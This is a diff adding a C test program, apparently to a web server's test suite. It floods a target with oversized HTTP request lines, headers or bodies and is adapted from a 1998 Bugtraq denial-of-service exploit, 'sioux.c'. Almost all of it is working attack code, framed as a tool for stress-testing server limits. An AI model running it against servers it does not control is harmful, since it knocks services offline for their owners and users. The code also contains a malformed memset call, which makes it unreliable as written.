diff options
Diffstat (limited to 'test/test_limits.c')
-rw-r--r-- | test/test_limits.c | 200 |
1 files changed, 200 insertions, 0 deletions
diff --git a/test/test_limits.c b/test/test_limits.c new file mode 100644 index 0000000..70b8098 --- /dev/null +++ b/test/test_limits.c @@ -0,0 +1,200 @@ +/************************************************************** + * test_limits.c + * + * A simple program for sending abusive requests to a server, based + * on the sioux.c exploit code that this nimrod posted (see below). + * Roy added options for testing long header fieldsize (-t h), long + * request-lines (-t r), and a long request body (-t b). + * + * FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2: + * gcc -o test_limits test_limits.c + * + * Solaris 2.5.1: + * gcc -o test_limits test_limits.c -lsocket -lnsl + * + * + * Message-ID: <861zqspvtw.fsf@niobe.ewox.org> + * Date: Fri, 7 Aug 1998 19:04:27 +0200 + * Sender: Bugtraq List <BUGTRAQ@netspace.org> + * From: Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG> + * Subject: YA Apache DoS attack + * + * Copyright (c) 1998 Dag-Erling Codan Smrgrav + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer + * in this position and unchanged. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * 3. The name of the author may not be used to endorse or promote products + * derived from this software withough specific prior written permission + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR + * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES + * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. + * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, + * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, + * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY + * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF + * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + * + */ + +/* + * Kudos to Mark Huizer who originally suggested this on freebsd-current + */ + +#include <sys/types.h> +#include <sys/uio.h> + +#include <sys/socket.h> +#include <netinet/in.h> + +#include <netdb.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> + +#define TEST_LONG_REQUEST_LINE 1 +#define TEST_LONG_REQUEST_FIELDS 2 +#define TEST_LONG_REQUEST_FIELDSIZE 3 +#define TEST_LONG_REQUEST_BODY 4 + +void +usage(void) +{ + fprintf(stderr, + "usage: test_limits [-t (r|n|h|b)] [-a address] [-p port] [-n num]\n"); + exit(1); +} + +int +main(int argc, char *argv[]) +{ + struct sockaddr_in sin; + struct hostent *he; + FILE *f; + int o, sd; + + /* default parameters */ + char *addr = "localhost"; + int port = 80; + int num = 1000; + int testtype = TEST_LONG_REQUEST_FIELDS; + + /* get options */ + while ((o = getopt(argc, argv, "t:a:p:n:")) != EOF) + switch (o) { + case 't': + if (*optarg == 'r') + testtype = TEST_LONG_REQUEST_LINE; + else if (*optarg == 'n') + testtype = TEST_LONG_REQUEST_FIELDS; + else if (*optarg == 'h') + testtype = TEST_LONG_REQUEST_FIELDSIZE; + else if (*optarg == 'b') + testtype = TEST_LONG_REQUEST_BODY; + break; + case 'a': + addr = optarg; + break; + case 'p': + port = atoi(optarg); + break; + case 'n': + num = atoi(optarg); + break; + default: + usage(); + } + + if (argc != optind) + usage(); + + /* connect */ + if ((he = gethostbyname(addr)) == NULL) { + perror("gethostbyname"); + exit(1); + } + memset(&sin, sizeof(sin)); + memcpy((char *)&sin.sin_addr, he->h_addr, he->h_length); + sin.sin_family = he->h_addrtype; + sin.sin_port = htons(port); + + if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) { + perror("socket"); + exit(1); + } + + if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { + perror("connect"); + exit(1); + } + + if ((f = fdopen(sd, "r+")) == NULL) { + perror("fdopen"); + exit(1); + } + + /* attack! */ + fprintf(stderr, "Testing like a plague of locusts on %s\n", addr); + + if (testtype == TEST_LONG_REQUEST_LINE) { + fprintf(f, "GET "); + while (num-- && !ferror(f)) { + fprintf(f, "/123456789"); + fflush(f); + } + fprintf(f, " HTTP/1.0\r\n\r\n"); + } + else { + fprintf(f, "GET /fred/foo HTTP/1.0\r\n"); + + if (testtype == TEST_LONG_REQUEST_FIELDSIZE) { + while (num-- && !ferror(f)) { + fprintf(f, "User-Agent: sioux"); + fflush(f); + } + fprintf(f, "\r\n"); + } + else if (testtype == TEST_LONG_REQUEST_FIELDS) { + while (num-- && !ferror(f)) + fprintf(f, "User-Agent: sioux\r\n"); + fprintf(f, "\r\n"); + } + else if (testtype == TEST_LONG_REQUEST_BODY) { + fprintf(f, "User-Agent: sioux\r\n"); + fprintf(f, "Content-Length: 33554433\r\n"); + fprintf(f, "\r\n"); + while (num-- && !ferror(f)) + fprintf(f, "User-Agent: sioux\r\n"); + } + else { + fprintf(f, "\r\n"); + } + } + fflush(f); + + { + apr_ssize_t len; + char buff[512]; + + while ((len = read(sd, buff, 512)) > 0) + len = write(1, buff, len); + } + if (ferror(f)) { + perror("fprintf"); + exit(1); + } + + fclose(f); + exit(0); +} |